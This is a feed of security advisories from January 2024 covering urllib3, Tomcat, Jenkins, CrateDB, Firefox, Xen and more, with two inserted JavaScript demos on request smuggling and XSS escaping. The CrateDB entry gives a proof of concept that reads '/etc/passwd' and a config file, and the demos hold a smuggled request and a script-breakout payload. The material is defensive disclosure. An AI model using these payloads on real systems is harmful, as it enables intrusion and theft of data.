25.01.2024 02:00:00 | redhat | [RHSA-2024:0464] python-urllib3 security update (moderate) | The python-urllib3 package provides the Python HTTP module with connection pooling and file POST abilities. Security Fix(es): python-urllib3: Cookie request header isn't stripped during cross-origin redirects (CVE-2023-43804); urllib3: Request body not stripped after redirect from 303 status changes request method to GET (CVE-2023-45803). For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0464
25.01.2024 02:00:00 | redhat | [RHSA-2024:0465] sqlite security update (moderate) | SQLite is a C library that implements an SQL database engine. A large subset of SQL92 is supported. A complete database is stored in a single disk file. The API is designed for convenience and ease of use. Applications that link against SQLite can enjoy the power and flexibility of an SQL database without the administrative hassles of supporting a separate database server. Security Fix(es): sqlite: heap-buffer-overflow at sessionfuzz (CVE-2023-7104). For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0465
25.01.2024 02:00:00 | redhat | [RHSA-2024:0466] python3.9 security update (moderate) | Python is an interpreted, interactive, object-oriented programming language, which includes modules, classes, exceptions, very high level dynamic data types and dynamic typing. Python supports interfaces to many system calls and libraries, as well as to various windowing systems. Security Fix(es): python: Parsing errors in email/_parseaddr.py lead to incorrect value in email address part of tuple (CVE-2023-27043). For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0466
25.01.2024 02:00:00 | redhat | [RHSA-2024:0468] grub2 security update (moderate) | The grub2 packages provide version 2 of the Grand Unified Boot Loader (GRUB), a highly configurable and customizable boot loader with modular architecture. The packages support a variety of kernel formats, file systems, computer architectures, and hardware devices. Security Fix(es): grub2: bypass the GRUB password protection feature (CVE-2023-4001). For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0468
25.01.2024 02:00:00 | redhat | [RHSA-2024:0474] tomcat security update (moderate) | Apache Tomcat is a servlet container for the Java Servlet and JavaServer Pages (JSP) technologies. Security Fix(es): tomcat: Open Redirect vulnerability in FORM authentication (CVE-2023-41080); tomcat: FileUpload: DoS due to accumulation of temporary files on Windows (CVE-2023-42794); tomcat: improper cleaning of recycled objects could lead to information leak (CVE-2023-42795); tomcat: incorrectly parsed http trailer headers can cause request smuggling (CVE-2023-45648). For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0474
25.01.2024 02:00:00 | redhat | [RHSA-2024:0477] frr security update (moderate) | FRRouting is free software that manages TCP/IP based routing protocols. It supports BGP4, OSPFv2, OSPFv3, ISIS, RIP, RIPng, PIM, NHRP, PBR, EIGRP and BFD. Security Fix(es): frr: Flowspec overflow in bgpd/bgp_flowspec.c (CVE-2023-38406); frr: Out of bounds read in bgpd/bgp_label.c (CVE-2023-38407); frr: crash from specially crafted MP_UNREACH_NLRI-containing BGP UPDATE message (CVE-2023-47234); frr: crash from malformed EOR-containing BGP UPDATE message (CVE-2023-47235). For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0477
26.01.2024 03:57:05 | maven | [MAVEN:GHSA-53PH-2R2X-VQW8] Cross-site WebSocket hijacking vulnerability in the Jenkins CLI (high) | Jenkins has a built-in command line interface (CLI) to access Jenkins from a script or shell environment. Since Jenkins 2.217 and LTS 2.222.1, one of the ways to communicate with the CLI is through a WebSocket endpoint. This endpoint relies on the default Jenkins web request authentication functionality, like HTTP Basic authentication with API tokens, or session cookies. This endpoint is enabled when running on a version of Jetty for which Jenkins supports WebSockets. This is the case when using the provided native installers, packages, or the Docker containers, as well as when running Jenkins with the command `java -jar jenkins.war`. Jenkins 2.217 through 2.441 (both inclusive) and LTS 2.222.1 through 2.426.2 (both inclusive) do not perform origin validation of requests made through the CLI WebSocket endpoint, resulting in a cross-site WebSocket hijacking (CSWSH) vulnerability. | https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-53PH-2R2X-VQW8
26.01.2024 03:56:44 | maven | [MAVEN:GHSA-6F9G-CXWR-Q5JR] Arbitrary file read vulnerability through the Jenkins CLI can lead to RCE (critical) | Jenkins has a built-in command line interface (CLI) to access Jenkins from a script or shell environment. Jenkins uses the args4j library to parse command arguments and options on the Jenkins controller when processing CLI commands. This command parser has a feature that replaces an @ character followed by a file path in an argument with the file's contents (expandAtFiles). This feature is enabled by default, and Jenkins 2.441 and earlier, LTS 2.426.2 and earlier do not disable it. This allows attackers to read arbitrary files on the Jenkins controller file system using the default character encoding of the Jenkins controller process. Attackers with Overall/Read permission can read entire files. Attackers without Overall/Read permission can read the first few lines of files; the number of lines that can be read depends on available CLI commands. As of publication of this advisory, the Jenkins security team has found ways to read the first three lines of files in recent releases of Jenkins without having any plugins installed, and has not identified any plugins that would increase this line count. Binary files containing cryptographic keys used for various Jenkins features can also be read, with some limitations (see note on binary files below). As of publication, the Jenkins security team has confirmed the following possible attacks in addition to reading contents of all files with a known file path. All of them leverage attackers' ability to obtain cryptographic keys from binary files, and are therefore only applicable to instances where that is feasible. | https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-6F9G-CXWR-Q5JR
26.01.2024 11:15:07 | alpinelinux | [ALPINE:CVE-2024-0727] openssl vulnerability | [From CVE-2024-0727] Issue summary: Processing a maliciously formatted PKCS12 file may lead OpenSSL to crash, leading to a potential Denial of Service attack. Impact summary: Applications loading files in the PKCS12 format from untrusted sources might terminate abruptly. A file in PKCS12 format can contain certificates and keys and may come from an untrusted source. The PKCS12 specification allows certain fields to be NULL, but OpenSSL does not correctly check for this case. This can lead to a NULL pointer dereference that results in OpenSSL crashing. If an application processes PKCS12 files from an untrusted source using the OpenSSL APIs then that application will be vulnerable to this issue. OpenSSL APIs that are vulnerable to this are: PKCS12_parse(), PKCS12_unpack_p7data(), PKCS12_unpack_p7encdata(), PKCS12_unpack_authsafes() and PKCS12_newpass(). We have also fixed a similar issue in SMIME_write_PKCS7(). However, since this function is related to writing data we do not consider it security significant. The FIPS modules in 3.2, 3.1 and 3.0 are not affected by this issue. | https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-0727
26.01.2024 10:00:00msrc[MS:CVE-2024-21336] Microsoft Edge (Chromium-based) Spoofing Vulnerability (low)https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21336
26.01.2024 12:16:18almalinux[ALSA-2024:0468] grub2 security update (moderate)grub2 security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:0468
27.01.2024 02:00:00debian[DSA-5608-1] gst-plugins-bad1.0security updatehttps://secdb.nttzen.cloud/security-advisory/debian/DSA-5608-1
26.01.2024 16:31:20suse[SUSE-SU-2024:0253-1] Security update for rear27a (important)Security update for rear27ahttps://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:0253-1
26.01.2024 16:09:52suse[SUSE-SU-2024:0252-1] Security update for xorg-x11-server (moderate)Security update for xorg-x11-serverhttps://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:0252-1
26.01.2024 16:03:38suse[SUSE-SU-2024:0251-1] Security update for xorg-x11-server (moderate)Security update for xorg-x11-serverhttps://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:0251-1
26.01.2024 15:52:43suse[SUSE-SU-2024:0250-1] Security update for sevctl (important)Security update for sevctlhttps://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:0250-1
26.01.2024 15:45:34suse[SUSE-SU-2024:0249-1] Security update for xorg-x11-server (moderate)Security update for xorg-x11-serverhttps://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:0249-1
26.01.2024 15:09:05suse[SUSE-SU-2024:0248-1] Security update for cpio (moderate)Security update for cpiohttps://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:0248-1
26.01.2024 15:01:46suse[SUSE-SU-2024:0247-1] Security update for rear23a (important)Security update for rear23ahttps://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:0247-1
26.01.2024 12:33:31suse[SUSE-SU-2024:0242-1] Security update for MozillaThunderbird (important)Security update for MozillaThunderbirdhttps://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:0242-1
28.01.2024 02:00:00debian[DSA-5609-1] slurm-wlm (critical)security updatehttps://secdb.nttzen.cloud/security-advisory/debian/DSA-5609-1
30.01.2024 00:43:38ubuntu[USN-6605-2] Linux kernel (KVM) vulnerabilities (high)Several security issues were fixed in the Linux kernel.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6605-2
30.01.2024 00:27:15ubuntu[USN-6604-2] Linux kernel (Azure) vulnerabilities (high)Several security issues were fixed in the Linux kernel.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6604-2
30.01.2024 00:28:56npm[NPM:GHSA-WPXW-5XFM-X22V] MeshCentral algorithm-downgrade issue (moderate)An algorithm-downgrade issue was discovered in Ylianst MeshCentral 1.1.16.https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-WPXW-5XFM-X22V
29.01.2024 20:08:52ubuntu[USN-6613-1] Ceph vulnerabilityCeph could be made to bypass authorization checks if it received a specially crafted request.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6613-1
29.01.2024 19:02:56ubuntu[USN-6612-1] TinyXML vulnerability (high)TinyXML could be made to crash if it opened a specially crafted file.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6612-1
30.01.2024 00:29:39maven[MAVEN:GHSA-3VVC-V8C2-43R7] Apache Kylin has Insufficiently Protected Credentials (moderate)In Apache Kylin version 2.0.0 to 4.0.3, there is a Server Config web interface that displays the content of the file 'kylin.properties', which may contain server-side credentials. When the kylin service runs over HTTP (or another plain-text protocol), it is possible for network sniffers to capture the HTTP payload and gain access to the content of kylin.properties and potentially the credentials it contains. To avoid this threat, users are recommended to: * Always turn on HTTPS so that the network payload is encrypted. * Avoid putting credentials in kylin.properties, or at least not in plain text. * Use network firewalls to protect the server side such that it is not accessible to external attackers. * Upgrade to Apache Kylin 4.0.4, which filters out the sensitive content that goes to the Server Config web interface.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-3VVC-V8C2-43R7
29.01.2024 13:21:22ubuntu[USN-6610-1] Firefox vulnerabilities (high)Several security issues were fixed in Firefox.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6610-1
29.01.2024 13:15:07alpinelinux[ALPINE:CVE-2023-46838] linux-lts vulnerability[From CVE-2023-46838] Transmit requests in Xen's virtual network protocol can consist of multiple parts. While not really useful, except for the initial part any of them may be of zero length, i.e. carry no data at all. Besides a certain initial portion of the to-be-transferred data, these parts are directly translated into what Linux calls SKB fragments. Such converted request parts can, when for a particular SKB they are all of length zero, lead to a de-reference of NULL in core networking code.https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2023-46838
29.01.2024 12:52:45ubuntu[USN-6611-1] Exim vulnerability (medium)Exim could be made to bypass an SPF protection mechanism if it received a specially crafted request.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6611-1
29.01.2024 02:00:00debian[DSA-5610-1] redis (high)security updatehttps://secdb.nttzen.cloud/security-advisory/debian/DSA-5610-1
29.01.2024 02:00:00redhat[RHSA-2024:0539] tomcat security update (important)Apache Tomcat is a servlet container for the Java Servlet and JavaServer Pages (JSP) technologies.Security Fix(es):* tomcat: HTTP request smuggling via malformed trailer headers (CVE-2023-46589)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0539
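The Tomcat entry above names the mechanism (request smuggling via malformed trailer headers) but not how a server ends up desynchronised from the reverse proxy in front of it. The block below is an added example, not Tomcat code or anything from the advisory: a parser for an HTTP/1.1 chunked body with trailers that can run in a strict mode, where any malformed trailer is fatal for the connection, and a lenient mode, where the parser gives up on the trailer section and hands the unread bytes back as the start of the next request. The 128-byte trailer limit and both sample messages are constructed for the demo.

```javascript
// Added example, not Tomcat code: a parser for an HTTP/1.1 chunked body with
// trailers that shows why a malformed trailer must be fatal for the connection.
// `raw` is a Buffer of everything received after the request header block.
// Constructed inputs below; the 128-byte trailer limit is an assumed value.
const CRLF = '\r\n';
const MAX_TRAILER_BYTES = 128;
// RFC 9110 tchar set, used to validate trailer field names.
const TOKEN_RE = /^[!#$%&'*+\-.^_`|~0-9A-Za-z]+$/;

function parseChunkedBody(raw, { strictTrailers = true } = {}) {
  const text = raw.toString('latin1'); // 1 byte == 1 char, so indices match
  let pos = 0;
  const chunks = [];
  const trailers = {};

  // Chunk loop: "<hex-size>[;ext]CRLF <data> CRLF", terminated by a 0 chunk.
  for (;;) {
    const lineEnd = text.indexOf(CRLF, pos);
    if (lineEnd === -1) throw new Error('incomplete chunk-size line');
    const sizeHex = text.slice(pos, lineEnd).split(';')[0].trim();
    if (!/^[0-9A-Fa-f]{1,8}$/.test(sizeHex)) throw new Error('bad chunk size');
    const size = parseInt(sizeHex, 16);
    pos = lineEnd + CRLF.length;
    if (size === 0) break;
    if (pos + size + CRLF.length > text.length) throw new Error('truncated chunk');
    chunks.push(text.slice(pos, pos + size));
    pos += size;
    if (text.slice(pos, pos + CRLF.length) !== CRLF) throw new Error('chunk not CRLF-terminated');
    pos += CRLF.length;
  }

  // Trailer section: zero or more "name: value" lines, then an empty line.
  const trailerStart = pos;
  for (;;) {
    const lineStart = pos;
    const lineEnd = text.indexOf(CRLF, pos);
    if (lineEnd === -1) throw new Error('incomplete trailer section');
    const line = text.slice(pos, lineEnd);
    pos = lineEnd + CRLF.length;
    if (line === '') break;
    const colon = line.indexOf(':');
    const name = colon > 0 ? line.slice(0, colon) : '';
    const malformed = !TOKEN_RE.test(name) || pos - trailerStart > MAX_TRAILER_BYTES;
    if (malformed) {
      if (strictTrailers) throw new Error('malformed trailer: ' + JSON.stringify(line));
      // Lenient behaviour: give up on trailers and hand the bytes back as the
      // start of the "next request". That is the desynchronisation an
      // attacker wants: the line becomes a request the front end never saw.
      return { body: chunks.join(''), trailers, rest: raw.subarray(lineStart) };
    }
    trailers[name.toLowerCase()] = line.slice(colon + 1).trim();
  }
  return { body: chunks.join(''), trailers, rest: raw.subarray(pos) };
}

// Constructed messages: a valid one and one whose trailer is a request line.
const VALID = Buffer.from('5\r\nhello\r\n0\r\nX-Checksum: abc\r\n\r\n', 'latin1');
const SMUGGLED = Buffer.from(
  '5\r\nhello\r\n0\r\nGET /admin HTTP/1.1\r\nHost: victim\r\n\r\n', 'latin1');

function demo() {
  const ok = parseChunkedBody(VALID);
  const lenient = parseChunkedBody(SMUGGLED, { strictTrailers: false });
  let strictRejected = false;
  try { parseChunkedBody(SMUGGLED); } catch (e) { strictRejected = true; }
  return {
    body: ok.body,
    checksum: ok.trailers['x-checksum'],
    leakedRequest: lenient.rest.toString('latin1').split(CRLF)[0],
    strictRejected,
  };
}
```

In lenient mode `demo()` reports `GET /admin HTTP/1.1` as the "next request" even though the proxy forwarded exactly one; in strict mode the same bytes produce an error and the connection should be closed, which is the only safe response once the framing is in doubt.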
29.01.2024 02:00:00redhat[RHSA-2024:0533] gnutls security update (moderate)The gnutls packages provide the GNU Transport Layer Security (GnuTLS) library, which implements cryptographic algorithms and protocols such as SSL, TLS, and DTLS.Security Fix(es):* gnutls: timing side-channel in the RSA-PSK authentication (CVE-2023-5981)* gnutls: incomplete fix for CVE-2023-5981 (CVE-2024-0553)* gnutls: rejects certificate chain with distributed trust (CVE-2024-0567)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0533
30.01.2024 00:30:31maven[MAVEN:GHSA-4HRP-M3F2-643J] Session fixation in Enonic XP (critical)Enonic XP versions less than 7.7.4 are vulnerable to a session fixation issue. A remote and unauthenticated attacker can reuse prior sessions because session attributes are not invalidated.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-4HRP-M3F2-643J
30.01.2024 00:30:44maven[MAVEN:GHSA-F4QF-M5GF-8JM8] Generation of Error Message Containing Sensitive Information (moderate)Generation of Error Message Containing Sensitive Information vulnerability in Apache Tomcat.This issue affects Apache Tomcat: from 8.5.7 through 8.5.63, from 9.0.0-M11 through 9.0.43.Users are recommended to upgrade to version 8.5.64 onwards or 9.0.44 onwards, which contain a fix for the issue.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-F4QF-M5GF-8JM8
30.01.2024 23:18:15ubuntu[USN-6609-2] Linux kernel (NVIDIA) vulnerabilities (high)Several security issues were fixed in the Linux kernel.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6609-2
30.01.2024 22:57:50npm[NPM:GHSA-RV8P-RR2H-FGPG] @apollo/experimental-nextjs-app-support Cross-site Scripting vulnerability (high)### Impact The @apollo/experimental-apollo-client-nextjs NPM package is vulnerable to a cross-site scripting vulnerability. This vulnerability arises from improper handling of untrusted input when @apollo/experimental-apollo-client-nextjs performs server-side rendering of HTML pages. To fix this vulnerability, we implemented appropriate escaping to prevent javascript injection into rendered pages. ### Patches To fix this issue, please update to version 0.7.0 or later. ### Workarounds There are no known workarounds for this issue. Please update to version 0.7.0https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-RV8P-RR2H-FGPG
30.01.2024 22:57:30npm[NPM:GHSA-QHJF-HM5J-335W] @urql/next Cross-site Scripting vulnerability (high)## Impact The `@urql/next` package is vulnerable to XSS. To exploit this an attacker would need to ensure that the response returns `html` tags and that the web-application is using streamed responses (non-RSC). This vulnerability is due to improper escaping of html-like characters in the response-stream. To fix this vulnerability upgrade to version 1.1.1https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-QHJF-HM5J-335W
30.01.2024 23:34:05npm[NPM:GHSA-997G-27X8-43RF] react-query-streamed-hydration Cross-site Scripting vulnerability (high)### Impact The `@tanstack/react-query-next-experimental` NPM package is vulnerable to a cross-site scripting vulnerability. To exploit this, an attacker would need to either inject malicious input or arrange to have malicious input be returned from an endpoint. This vulnerability arises from improper handling of untrusted input when `@tanstack/react-query-next-experimental` performs server-side rendering of HTML pages. To fix this vulnerability, we implemented appropriate escaping to prevent javascript injection into rendered pages. ### Patches To fix this issue, please update to version 5.18.0 or later. ### Workarounds There are no known workarounds for this issue. Please update to version 5.18.0 or later.https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-997G-27X8-43RF
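The three advisories above (@apollo/experimental-nextjs-app-support, @urql/next and @tanstack/react-query-next-experimental) describe the same bug class: server-rendered or streamed hydration state is written into a `<script>` element, and response data containing HTML-like characters breaks out of it. The block below is an added example, not code from any of those projects: it shows the unescaped rendering next to a hardened one that escapes `<`, `>`, `&` and the U+2028/U+2029 line terminators using JSON string escapes, so the browser sees one script element and `JSON.parse` still recovers the original data. The `window.__STATE__` / `window.__PUSH__` slots and the hostile state value are constructed for the demo.

```javascript
// Added example, not code from Apollo, urql or TanStack: how server-rendered
// state is embedded in a page, and why raw JSON.stringify is not enough.
// The state value and the window.__STATE__ slot are constructed for the demo.

// Escape the characters that let JSON break out of a <script> element or
// terminate a JS string: '<' closes the element via "</script>", '&' matters
// where the output is re-parsed as HTML, U+2028/2029 end a line in old engines.
// Every replacement is a valid JSON escape, so JSON.parse sees the same data.
function escapeJsonForHtmlScript(json) {
  return json
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/&/g, '\\u0026')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

// Vulnerable form: attacker-influenced data is dropped into the page verbatim.
function renderStateScriptUnsafe(state) {
  return `<script>window.__STATE__=${JSON.stringify(state)}</script>`;
}

// Hardened form: same output shape, escaped payload.
function renderStateScript(state) {
  return `<script>window.__STATE__=${escapeJsonForHtmlScript(JSON.stringify(state))}</script>`;
}

// Streaming hydration sends many small chunks; escape each one the same way.
function renderStreamChunk(chunk) {
  return `<script>window.__PUSH__(${escapeJsonForHtmlScript(JSON.stringify(chunk))})</script>`;
}

// Constructed data: a query echoed back into the page, carrying a payload.
const HOSTILE_STATE = { query: '</script><img src=x onerror=alert(1)>', page: 1 };

// How many times the HTML parser will see a closing script tag.
function countClosingScriptTags(html) {
  return html.split('</script').length - 1;
}
```

`renderStateScriptUnsafe(HOSTILE_STATE)` yields two `</script` sequences, so the browser closes the element early and renders the `<img>` with its `onerror` handler; the hardened form yields exactly one, and the escaped payload parses back to the original object.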
30.01.2024 22:57:20maven[MAVEN:GHSA-475G-VJ6C-XF96] CrateDB database has an arbitrary file read vulnerability (moderate)### Summary There is an arbitrary file read vulnerability in the CrateDB database: authenticated CrateDB database users can read any file on the system. ### Details There is a COPY FROM function in the CrateDB database that is used to import file data into database tables. This function has a flaw, and authenticated attackers can use the COPY FROM function to import arbitrary file content into database tables, resulting in information leakage. ### PoC ```CREATE TABLE info_leak(info_leak STRING); COPY info_leak FROM '/etc/passwd' with (format='csv', header=false);``` or ```COPY info_leak FROM '/crate/config/crate.yml' with (format='csv', header=false);``` then ```SELECT * FROM info_leak;``` ### Impact This vulnerability affects all current versions of the CrateDB database. Attackers who exploit this vulnerability to obtain sensitive information may carry out further attacks, while also affecting CrateDB Cloud Clusters.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-475G-VJ6C-XF96
30.01.2024 17:17:54ubuntu[USN-6618-1] Pillow vulnerabilities (high)Several security issues were fixed in Pillow.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6618-1
30.01.2024 16:17:08ubuntu[USN-6617-1] libde265 vulnerabilities (high)Several security issues were fixed in libde265.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6617-1
30.01.2024 14:50:20ubuntu[USN-6587-3] X.Org X Server regressionA regression was fixed in X.Org X Serverhttps://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6587-3
30.01.2024 14:42:51ubuntu[USN-6616-1] OpenLDAP vulnerability (high)OpenLDAP could be made to crash if it received specially crafted input.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6616-1
30.01.2024 14:38:24ubuntu[USN-6615-1] MySQL vulnerabilities (medium)Several security issues were fixed in MySQL.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6615-1
30.01.2024 14:00:00xen[XSA-449] pci: phantom functions assigned to incorrect contexts**ISSUE DESCRIPTION** PCI devices can make use of a functionality called phantom functions, that when enabled allows the device to generate requests using the IDs of functions that are otherwise unpopulated. This allows a device to extend the number of outstanding requests. Such phantom functions need an IOMMU context setup, but failure to set up the context is not fatal when the device is assigned. Not failing device assignment when such failure happens can lead to the primary device being assigned to a guest, while some of the phantom functions are assigned to a different domain. **IMPACT** Under certain circumstances a malicious guest assigned a PCI device with phantom functions may be able to access memory from a previous owner of the device. **VULNERABLE SYSTEMS** Systems running all versions of Xen are affected. Only x86 systems are vulnerable. Arm systems are not vulnerable. Only systems using PCI passthrough of devices with phantom functions are affected.https://secdb.nttzen.cloud/security-advisory/xen/XSA-449
30.01.2024 14:00:00xen[XSA-450] VT-d: Failure to quarantine devices in !HVM builds**ISSUE DESCRIPTION** Incorrect placement of a preprocessor directive in source code results in logic that doesn't operate as intended when support for HVM guests is compiled out of Xen. **IMPACT** When a device is removed from a domain, it is not properly quarantined and retains its access to the domain to which it was previously assigned. **VULNERABLE SYSTEMS** Xen 4.17 and onwards are vulnerable. Xen 4.16 and older are not vulnerable. Only Xen running on x86 platforms with an Intel-compatible VT-d IOMMU is vulnerable. Platforms from other manufacturers, or platforms without a VT-d IOMMU, are not vulnerable. Only systems where PCI devices are passed through to untrusted or semi-trusted guests are vulnerable. Systems which do not assign PCI devices to untrusted guests are not vulnerable. Xen is only vulnerable when CONFIG_HVM is disabled at build time. Most deployments of Xen are expected to have CONFIG_HVM enabled at build time, and would therefore not be vulnerable.https://secdb.nttzen.cloud/security-advisory/xen/XSA-450
30.01.2024 12:36:10ubuntu[USN-6614-1] amanda vulnerability (high)amanda could be used to escalate privilege if it was provided with specially crafted arguments.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6614-1
30.01.2024 10:00:00msrc[MS:CVE-2024-21388] Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability (important)https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21388
30.01.2024 20:43:06npm[NPM:GHSA-VVH2-82C7-PPFG] network Arbitrary Command Injection vulnerability (high)Versions of the package network before 0.7.0 are vulnerable to Arbitrary Command Injection due to use of the `child_process` exec function without input sanitization. If (attacker-controlled) user input is given to the `mac_address_for` function of the package, it is possible for an attacker to execute arbitrary commands on the operating system that this package is being run on.https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-VVH2-82C7-PPFG
30.01.2024 20:43:27maven[MAVEN:GHSA-7MGX-GVJW-M3W3] CrateDB authentication bypass vulnerability (moderate)CrateDB 5.5.1 contains an authentication bypass vulnerability in the Admin UI component. When password authentication is configured together with a trust entry for the `_local_` address, authentication can be bypassed by setting the X-Real-IP request header to a specific value and accessing the Admin UI directly as the default user.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-7MGX-GVJW-M3W3
30.01.2024 20:44:28npm[NPM:GHSA-8XW6-9H78-C89J] Ylianst MeshCentral Missing SSL Certificate Validation (moderate)Ylianst MeshCentral 1.1.16 is vulnerable to Missing SSL Certificate Validation.https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-8XW6-9H78-C89J
30.01.2024 02:00:00debian[DSA-5611-1] glibcsecurity updatehttps://secdb.nttzen.cloud/security-advisory/debian/DSA-5611-1
30.01.2024 02:00:00redhat[RHSA-2024:0606] openssh security update (moderate)OpenSSH is an SSH protocol implementation supported by a number of Linux, UNIX, and similar operating systems. It includes the core files necessary for both the OpenSSH client and server.Security Fix(es):* ssh: Prefix truncation attack on Binary Packet Protocol (BPP) (CVE-2023-48795)* openssh: potential command injection via shell metacharacters (CVE-2023-51385)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0606
30.01.2024 02:00:00redhat[RHSA-2024:0600] firefox security update (important)Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability.This update upgrades Firefox to version 115.7.0 ESR.Security Fix(es):* Mozilla: Out of bounds write in ANGLE (CVE-2024-0741)* Mozilla: Failure to update user input timestamp (CVE-2024-0742)* Mozilla: Crash when listing printers on Linux (CVE-2024-0746)* Mozilla: Bypass of Content Security Policy when directive unsafe-inline was set (CVE-2024-0747)* Mozilla: Phishing site popup could show local origin in address bar (CVE-2024-0749)* Mozilla: Potential permissions request bypass via clickjacking (CVE-2024-0750)* Mozilla: Privilege escalation through devtools (CVE-2024-0751)* Mozilla: HSTS policy on subdomain could bypass policy of upper domain (CVE-2024-0753)* Mozilla: Memory safety bugs fixed in Firefox 122, Firefox ESR 115.7, and Thunderbird 115.7 (CVE-2024-0755)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0600
30.01.2024 02:00:00redhat[RHSA-2024:0601] thunderbird security update (important)Mozilla Thunderbird is a standalone mail and newsgroup client.This update upgrades Thunderbird to version 115.7.0.Security Fix(es):* Mozilla: Out of bounds write in ANGLE (CVE-2024-0741)* Mozilla: Failure to update user input timestamp (CVE-2024-0742)* Mozilla: Crash when listing printers on Linux (CVE-2024-0746)* Mozilla: Bypass of Content Security Policy when directive unsafe-inline was set (CVE-2024-0747)* Mozilla: Phishing site popup could show local origin in address bar (CVE-2024-0749)* Mozilla: Potential permissions request bypass via clickjacking (CVE-2024-0750)* Mozilla: Privilege escalation through devtools (CVE-2024-0751)* Mozilla: HSTS policy on subdomain could bypass policy of upper domain (CVE-2024-0753)* Mozilla: Memory safety bugs fixed in Firefox 122, Firefox ESR 115.7, and Thunderbird 115.7 (CVE-2024-0755)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0601
30.01.2024 02:00:00redhat[RHSA-2024:0607] tigervnc security update (important)Virtual Network Computing (VNC) is a remote display system which allows users to view a computing desktop environment not only on the machine where it is running, but from anywhere on the Internet and from a wide variety of machine architectures. TigerVNC is a suite of VNC servers and clients.Security Fix(es):* xorg-x11-server: Heap buffer overflow in DeviceFocusEvent and ProcXIQueryPointer (CVE-2023-6816)* xorg-x11-server: reattaching to different master device may lead to out-of-bounds memory access (CVE-2024-0229)* xorg-x11-server: heap buffer overflow in XISendDeviceHierarchyEvent (CVE-2024-21885)* xorg-x11-server: heap buffer overflow in DisableDevice (CVE-2024-21886)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0607
